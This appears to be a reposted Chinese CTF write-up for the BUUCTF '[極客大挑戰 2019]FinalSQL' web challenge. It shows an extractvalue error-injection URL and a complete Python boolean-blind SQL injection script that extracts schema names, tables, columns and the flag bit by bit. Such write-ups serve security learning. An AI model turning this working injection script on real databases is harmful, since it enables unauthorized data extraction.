CTF-Web-[極客大挑戰 2019]FinalSQL

時間 2020-05-04

標籤 ctf web 極客挑戰 finalsql 欄目 HTML 简体版

原文原文鏈接

CTF-Web-[極客大挑戰 2019]FinalSQL

博客說明php

文章所涉及的資料來自互聯網整理和我的總結，意在於我的學習和經驗彙總，若有什麼地方侵權，請聯繫本人刪除，謝謝！本文僅用於學習與交流，不得用於非法用途！

CTP平臺

網址node

https://buuoj.cn/challengespython

題目

Web類，[極客大挑戰 2019]FinalSQLsql

打開題目的實例數據庫

思路

SQl的題目，首先試一試萬能密碼(雖然不可能，可是仍是得試一下)學習

試一下雙寫url

看來被封死了，想一想其餘的辦法，能夠使用extractvalue和updatexml進行報錯注入，空格和=號沒有，因此咱們要使用（）來代替空格，使用like來代替=號spa

使用extractvalue（）3d

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database()))))%23

看來是增強到最後一版本了，仔細查看它的提示，試一試盲注code

盲注

試着寫腳本，不用試着了，網上大神的腳本

# -*- coding: utf-8 -*-
# @Author: jiaoben
# @Date  :  2020/05/03

import re
import requests
import string

url = "http://dcf33d60-7ffa-41c0-8915-e935ccbdd37b.node3.buuoj.cn//search.php"
flag = ''


def payload(i, j):
    # 數據庫名字
    sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    # 表名
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)
    # 列名
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)
    # 查詢flag
    # sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    # print (r.url)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)

取消數據庫的註釋